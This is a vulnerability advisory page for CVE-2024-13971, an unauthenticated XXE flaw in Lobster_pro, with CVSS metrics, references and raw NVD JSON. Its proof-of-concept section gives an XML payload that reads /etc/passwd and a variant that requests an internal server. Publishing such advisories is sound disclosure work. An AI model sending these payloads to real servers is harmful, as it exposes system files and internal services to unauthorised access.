CVE-2024-13971

Description

Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:lobster-world:lobster_pro:*:*:*:*:*:*:*:* - VULNERABLE

Lobster_pro < 4.12.6-GA

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<root>&xxe;</root>

<!-- Alternatively for HTTP GET attack -->
<!--
<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "http://internal-server/secret"> 
]>
<root>&xxe;</root>
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-13971
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-13971
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-13971/
[4] VulDB https://vuldb.com/cve/CVE-2024-13971
[5] https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/
[6] http://seclists.org/fulldisclosure/2026/May/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-13971", "sourceIdentifier": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "published": "2026-04-30T13:16:02.680", "lastModified": "2026-05-17T23:17:01.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services."}], "metrics": {"cvssMetricV40": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:C/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lobster-world:lobster_pro:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.12.6-ga", "matchCriteriaId": "85F6EBAB-2377-46FC-9539-1AB64764FBB9"}]}]}], "references": [{"url": "https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/May/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}